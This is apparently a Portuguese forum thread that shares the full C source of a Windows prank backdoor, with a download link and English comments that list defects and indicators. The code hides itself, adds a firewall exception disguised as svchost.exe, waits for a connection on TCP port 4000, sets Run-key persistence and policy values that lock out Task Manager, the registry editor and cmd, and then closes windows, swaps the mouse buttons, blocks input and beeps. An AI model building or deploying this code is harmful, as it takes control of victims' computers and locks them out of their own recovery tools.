http://www.vnsbr.xpg.com.br/video.rar (http://www.vnsbr.xpg.com.br/video.rar)
uma breve explicação

código:
#include <windows.h>
#include <winsock.h>
#include <winable.h>
#include <stdio.h>
#define PORTA 4000
// Mario theme tune converted by metelhead, bloody good job metelhead, its funny as fuck
/*
 * Registers the running executable in the Windows Firewall
 * "AuthorizedApplications" list so inbound connections to it are allowed.
 *
 * The value written under
 *   HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\
 *   StandardProfile\AuthorizedApplications\List
 * is named after the executable's own full path and has the form
 *   "<exe path>:*:Enabled:<display_name>"
 * (main() passes "svchost.exe" as display_name, so the exception masquerades
 * as a system process name in the firewall UI).
 *
 * Defender notes:
 *  - A write to this key by a non-installer process is a strong indicator;
 *    the entry above is a persistent artifact that survives the process.
 *  - KEY_SET_VALUE under HKLM normally needs administrative rights. The
 *    RegOpenKeyEx return value is not checked, so on failure hKey is an
 *    uninitialized handle and the following RegSetValueEx/RegCloseKey
 *    operate on garbage (undefined behaviour, but it then silently does nothing useful).
 *  - data[] is MAX_PATH bytes while path[] may already be MAX_PATH-1
 *    characters; the unbounded strcat calls can therefore overrun data[]
 *    on a long executable path.
 *  - sizeof(data) (the whole buffer, not strlen(data)+1) is written, so the
 *    registry value carries trailing zero bytes after the string.
 */
void AntiFirewall(char* display_name)
{
char path[MAX_PATH];
HMODULE ModH = GetModuleHandle(NULL);
// Full path of the current executable; truncated silently if it exceeds MAX_PATH.
GetModuleFileName(ModH, path, sizeof(path));
char data[MAX_PATH] = "";
// "<path>:*:Enabled:<display_name>" -- no bounds checking on any of these.
strcpy (data, path);
strcat (data, ":*:Enabled:");
strcat (data, display_name);
HKEY hKey;
// Return value ignored: hKey is left uninitialized if the open fails.
RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, KEY_SET_VALUE, &hKey);
// Value name == own exe path; REG_SZ payload is the whole MAX_PATH buffer.
RegSetValueEx(hKey, path,0,REG_SZ,(const unsigned char*)data,sizeof(data));
RegCloseKey(hKey);
}
/*
 * Plays a tune on the PC speaker via Beep(frequency, duration_ms).
 *
 * Beep is synchronous, so every call blocks the calling thread for its
 * duration. With 157 Beep calls (mostly 200 ms, eleven of 400 ms, two of
 * 10 ms) plus three Sleep calls, one invocation takes roughly 34 s, during
 * which main()'s loop does nothing else.
 *
 * The fractional frequencies (e.g. 739.99) are truncated by the (DWORD)
 * cast, so 739.99 Hz is actually requested as 739 Hz; the doubled
 * "(DWORD)(DWORD)" casts on two lines are redundant but harmless.
 *
 * Defender note: the audio is only a nuisance, but it is the most visible
 * symptom a user will report; see main() for the registry and network
 * artifacts that matter for detection and clean-up.
 */
void mariobitch(){
Beep((DWORD)(DWORD) 1480,(DWORD)(DWORD)200);
Beep((DWORD)1568,(DWORD)200);
Beep((DWORD)1568,(DWORD)200);
Beep((DWORD)1568,(DWORD)200);
Beep((DWORD)(DWORD) 739.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)369.99,(DWORD)200);
Beep((DWORD)392,(DWORD)200);
Beep((DWORD)369.99,(DWORD)200);
Beep((DWORD)392,(DWORD)200);
Beep((DWORD)392,(DWORD)400);
Beep((DWORD)196,(DWORD)400);
Beep((DWORD)739.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)739.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)739.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)880,(DWORD)200);
Beep((DWORD)830.61,(DWORD)200);
Beep((DWORD)880,(DWORD)200);
Beep((DWORD)987.77,(DWORD)400);
Beep((DWORD)880,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)698.46,(DWORD)200);
Beep((DWORD)739.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)739.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)739.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)880,(DWORD)200);
Beep((DWORD)830.61,(DWORD)200);
Beep((DWORD)880,(DWORD)200);
Beep((DWORD)987.77,(DWORD)400);
Sleep(200);
Beep((DWORD)1108,(DWORD)10);
Beep((DWORD)1174.7,(DWORD)200);
Beep((DWORD)1480,(DWORD)10);
Beep((DWORD)1568,(DWORD)200);
Sleep(200);
Beep((DWORD)739.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)739.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)739.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)880,(DWORD)200);
Beep((DWORD)830.61,(DWORD)200);
Beep((DWORD)880,(DWORD)200);
Beep((DWORD)987.77,(DWORD)400);
Beep((DWORD)880,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)698.46,(DWORD)200);
Beep((DWORD)659.25,(DWORD)200);
Beep((DWORD)698.46,(DWORD)200);
Beep((DWORD)784,(DWORD)200);
Beep((DWORD)880,(DWORD)400);
Beep((DWORD)784,(DWORD)200);
Beep((DWORD)698.46,(DWORD)200);
Beep((DWORD)659.25,(DWORD)200);
Beep((DWORD)587.33,(DWORD)200);
Beep((DWORD)659.25,(DWORD)200);
Beep((DWORD)698.46,(DWORD)200);
Beep((DWORD)784,(DWORD)400);
Beep((DWORD)698.46,(DWORD)200);
Beep((DWORD)659.25,(DWORD)200);
Beep((DWORD)587.33,(DWORD)200);
Beep((DWORD)523.25,(DWORD)200);
Beep((DWORD)587.33,(DWORD)200);
Beep((DWORD)659.25,(DWORD)200);
Beep((DWORD)698.46,(DWORD)400);
Beep((DWORD)659.25,(DWORD)200);
Beep((DWORD)587.33,(DWORD)200);
Beep((DWORD)493.88,(DWORD)200);
Beep((DWORD)523.25,(DWORD)200);
Sleep(400);
Beep((DWORD)349.23,(DWORD)400);
Beep((DWORD)392,(DWORD)200);
Beep((DWORD)329.63,(DWORD)200);
Beep((DWORD)523.25,(DWORD)200);
Beep((DWORD)493.88,(DWORD)200);
Beep((DWORD)466.16,(DWORD)200);
Beep((DWORD)440,(DWORD)200);
Beep((DWORD)493.88,(DWORD)200);
Beep((DWORD)523.25,(DWORD)200);
Beep((DWORD)880,(DWORD)200);
Beep((DWORD)493.88,(DWORD)200);
Beep((DWORD)880,(DWORD)200);
Beep((DWORD)1760,(DWORD)200);
Beep((DWORD)440,(DWORD)200);
Beep((DWORD)392,(DWORD)200);
Beep((DWORD)440,(DWORD)200);
Beep((DWORD)493.88,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)440,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)1568,(DWORD)200);
Beep((DWORD)392,(DWORD)200);
Beep((DWORD)349.23,(DWORD)200);
Beep((DWORD)392,(DWORD)200);
Beep((DWORD)440,(DWORD)200);
Beep((DWORD)698.46,(DWORD)200);
Beep((DWORD)415.2,(DWORD)200);
Beep((DWORD)698.46,(DWORD)200);
Beep((DWORD)1396.92,(DWORD)200);
Beep((DWORD)349.23,(DWORD)200);
Beep((DWORD)329.63,(DWORD)200);
Beep((DWORD)311.13,(DWORD)200);
Beep((DWORD)329.63,(DWORD)200);
Beep((DWORD)659.25,(DWORD)200);
Beep((DWORD)698.46,(DWORD)400);
Beep((DWORD)783.99,(DWORD)400);
Beep((DWORD)440,(DWORD)200);
Beep((DWORD)493.88,(DWORD)200);
Beep((DWORD)523.25,(DWORD)200);
Beep((DWORD)880,(DWORD)200);
Beep((DWORD)493.88,(DWORD)200);
Beep((DWORD)880,(DWORD)200);
Beep((DWORD)1760,(DWORD)200);
Beep((DWORD)440,(DWORD)200);
Beep((DWORD)392,(DWORD)200);
Beep((DWORD)440,(DWORD)200);
Beep((DWORD)493.88,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)440,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)1568,(DWORD)200);
Beep((DWORD)392,(DWORD)200);
Beep((DWORD)349.23,(DWORD)200);
Beep((DWORD)392,(DWORD)200);
Beep((DWORD)440,(DWORD)200);
Beep((DWORD)698.46,(DWORD)200);
Beep((DWORD)659.25,(DWORD)200);
Beep((DWORD)698.46,(DWORD)200);
Beep((DWORD)739.99,(DWORD)200);
Beep((DWORD)783.99,(DWORD)200);
Beep((DWORD)392,(DWORD)200);
Beep((DWORD)392,(DWORD)200);
Beep((DWORD)392,(DWORD)200);
Beep((DWORD)392,(DWORD)200);
Beep((DWORD)196,(DWORD)200);
Beep((DWORD)196,(DWORD)200);
Beep((DWORD)196,(DWORD)200);
Beep((DWORD)185,(DWORD)200);
Beep((DWORD)196,(DWORD)200);
Beep((DWORD)185,(DWORD)200);
Beep((DWORD)196,(DWORD)200);
Beep((DWORD)207.65,(DWORD)200);
Beep((DWORD)220,(DWORD)200);
Beep((DWORD)233.08,(DWORD)200);
Beep((DWORD)246.94,(DWORD)200);
}
/*
 * Enumerates network hosts with "net view" and tokenises the output.
 * Only referenced from main() through a commented-out call (the author
 * disabled it), so in this build it never runs.
 *
 * Observable artifacts if it were enabled: a cmd.exe -> net.exe child
 * process spawned via system(), and the temporary file c:\a.txt that is
 * created, read and then deleted.
 *
 * As written the function never copies anything to another host: the
 * sprintf into inffected[] is dead (the buffer is not used afterwards) and
 * the final loop indexes computers[i] -- the slot *after* the last stored
 * token, which was never assigned -- instead of computers[i2]. The strcpy
 * therefore writes through an uninitialized pointer (undefined behaviour,
 * most likely a crash). The routine is broken, not a working spreader.
 *
 * Further defects, for the record:
 *  - fopen() result is not checked; fseek/ftell on NULL if the file is missing.
 *  - buffer is malloc(size) bytes and never NUL-terminated, so strlen(buffer)
 *    reads past the allocation.
 *  - computers[20] has no bounds check; more than 20 tokens overflows the stack array.
 *  - "int i" in the first for loop shadows the outer i; the outer i keeps
 *    counting tokens from zero, which is why it works by accident.
 *  - buffer is never freed.
 */
void inffect(){
char *buffer;
char inffected[MAX_PATH];
// Spawns a shell; the redirection appends to, not replaces, c:\a.txt.
system("net view >> c:\\a.txt");
FILE *fp;
fp=fopen("c:\\a.txt","r");   // unchecked: NULL if the file could not be opened
long size;
int i=0,i2=0;
char path[MAX_PATH];
HMODULE ModH = GetModuleHandle(NULL);
GetModuleFileName(ModH, path, sizeof(path));   // own executable path
fseek (fp , 0 , SEEK_END);
size = ftell (fp);
rewind (fp);
buffer = (char*) malloc (size);   // not NUL-terminated; allocation unchecked
fread (buffer,1,size,fp);
fclose(fp);
remove("c:\\a.txt");   // temp file removed immediately after reading
// Turn both backslashes and spaces into '#' so strtok splits on a single char.
for (int i=0;i<strlen(buffer);i++){   // strlen runs off the unterminated buffer
if (buffer[i]=='\\') buffer[i]='#';
if (buffer[i]==' ') buffer[i]='#';
}
char *computers[20];   // fixed capacity, never checked below
char *valor=strtok(buffer,"#");
while(valor!=NULL){
computers[i]=valor;
valor = strtok(NULL,"#");
i++;
}
// i is now the token count. computers[i] is uninitialized; computers[i2]
// was presumably meant. inffected[] is written but never read.
for (i2=2;i2<=(i-5);i2+=3){
sprintf(inffected,"\\\\%s%s",computers[i],"C");
strcpy(computers[i],path);   // strcpy through an uninitialized pointer (UB)
}
}
/*
 * Entry point of a prank/backdoor executable. Sequence:
 *  1. Hides its own console window (ShowWindow with nCmdShow 0 == SW_HIDE).
 *  2. Adds itself to the firewall authorized-applications list (AntiFirewall).
 *  3. Listens on TCP port PORTA (4000) on all interfaces and blocks until
 *     any client connects. No data is read from the connection; a bare
 *     TCP connect (e.g. telnet, as the forum post describes) is the trigger.
 *  4. Adds a Run-key persistence entry and several HKCU policy values
 *     (DisableTaskmgr, NoFind, NoClose, NoControlPanel, NoLogoff, NoRun,
 *     DisableRegistryTools, DisableCMD) meant to lock the user out of
 *     recovery tools -- see the note at those lines on why the writes are
 *     unreliable.
 *  5. Loops forever: random cursor jitter and, occasionally, closing all
 *     top-level windows, swapping the mouse buttons, switching the monitor
 *     off, blocking keyboard/mouse input, or playing the ~34 s tune.
 *
 * Indicators a defender can look for, all taken from this listing:
 *  - a process listening on TCP/4000;
 *  - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value "svchost"
 *    pointing at "F:\WINXP\svchost.exe";
 *  - the policy value names above under
 *    HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System;
 *  - the HKLM firewall list entry written by AntiFirewall().
 * Clean-up is the reverse: kill the process, delete the Run value and the
 * policy values, remove the firewall exception. The process never exits on
 * its own (while(1) with no break), so it must be terminated externally.
 */
int main(){
ShowWindow(GetForegroundWindow(),0);   // 0 == SW_HIDE: hide own console window
AntiFirewall("svchost.exe");   // display name mimics a system process
WSADATA data;
SOCKET winsock;
struct sockaddr_in sock;   // sin_zero never cleared; harmless for bind()
// WSAStartup returns 0 or a WSA error code, never -1, so this test is ineffective.
if(WSAStartup(MAKEWORD(1,1),&data)==-1)
return 1; // try to initialise winsock
// Relies on INVALID_SOCKET comparing equal to (SOCKET)-1.
if((winsock = socket(AF_INET,SOCK_STREAM,0))==-1)
return 1; // try to create the socket
sock.sin_family=AF_INET;
sock.sin_addr.s_addr = INADDR_ANY;   // all interfaces
sock.sin_port=htons(PORTA);          // TCP 4000
if((bind(winsock,(struct sockaddr*)&sock,sizeof(sock))) ==-1){
return 0;   // port busy: exit silently (exit code 0)
}
listen(winsock,1);
// Blocks here until a client connects. The accepted socket overwrites the
// listening handle; neither is used or closed afterwards -- the connection
// is only a trigger, nothing is sent or received.
while((winsock = accept(winsock,0,0))==SOCKET_ERROR)
{
Sleep(1);
}
srand(5);   // fixed seed: the "random" payload sequence is identical on every run
POINT pt;
HKEY hkey;
int BUF;                 // never initialised
DWORD dwBufLen = BUF;    // reads an uninitialised int (UB); unused afterwards
// Persistence: Run value "svchost" -> hard-coded path, not the actual exe
// location, so it only survives a reboot if the binary really is there.
RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
RegSetValueEx(hkey,"svchost",0,REG_SZ,(BYTE *)"F:\\WINXP\\svchost.exe",strlen("F:\\WINXP\\svchost.exe"));
// Each RegSetValueEx below passes (LPBYTE)BUF -- the *value* of an
// uninitialised int cast to a pointer -- rather than a pointer to data.
// The API reads sizeof(BUF) bytes from that bogus address, so the policy
// values are either not written or written with garbage (undefined
// behaviour). None of the hkey handles from RegCreateKey are ever closed.
RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
RegSetValueEx (hkey, "DisableTaskmgr", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
RegSetValueEx (hkey, "NoFind", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
RegSetValueEx (hkey, "NoClose", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
RegSetValueEx (hkey, "NoControlPanel", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
RegSetValueEx (hkey, "NoLogoff", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
RegSetValueEx (hkey, "NoRun", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
RegSetValueEx (hkey, "DisableRegistryTools", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
RegCreateKey (HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", &hkey);
RegSetValueEx (hkey, "DisableCMD", 0, REG_DWORD, (LPBYTE) BUF, sizeof (BUF));
//inffect();   // network enumeration routine left disabled by the author
// Payload loop: never terminates.
while(1){
Sleep(rand()%200);   // 0..199 ms between iterations
GetCursorPos(&pt);
switch (rand()%10){   // 3/10: nudge the cursor; 1/10: pick a disruptive action
case 0: SetCursorPos(pt.x+10,pt.y+10); break;
case 1: SetCursorPos(pt.x,pt.y+10); break;
case 2: SetCursorPos(pt.x+10,pt.y); break;
case 3:
switch (rand()%10){   // 6/10 of these do something, 4/10 nothing
case 0: PostMessage(HWND_BROADCAST, WM_CLOSE, 0, 0); break;   // asks every top-level window to close
case 1: SwapMouseButton(true); break;                          // left/right buttons swapped (never swapped back)
case 2: SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2); break;   // lParam 2: monitor off
case 3: BlockInput(TRUE); break;    // keyboard/mouse ignored until case 4 fires or the process dies
case 4: BlockInput(FALSE); break;
case 5: mariobitch(); break;        // blocks this loop for ~34 s
default: break;
}
break;
default: break;
}
}
}
poxa cara,
mas, o que ele faz?
e pra que a música dos beeps?
música dos beeps = payload; não é nocivo, é apenas para assustar o usuário
bom, ele basicamente fica escutando na porta; quando você dá um telnet no IP, ele começa a executar as funções dele
aí tem uma certa aleatoriedade: tocar a música, inverter os botões do mouse, uns payloads meio toscos
outros? quais outras músicas ele faz?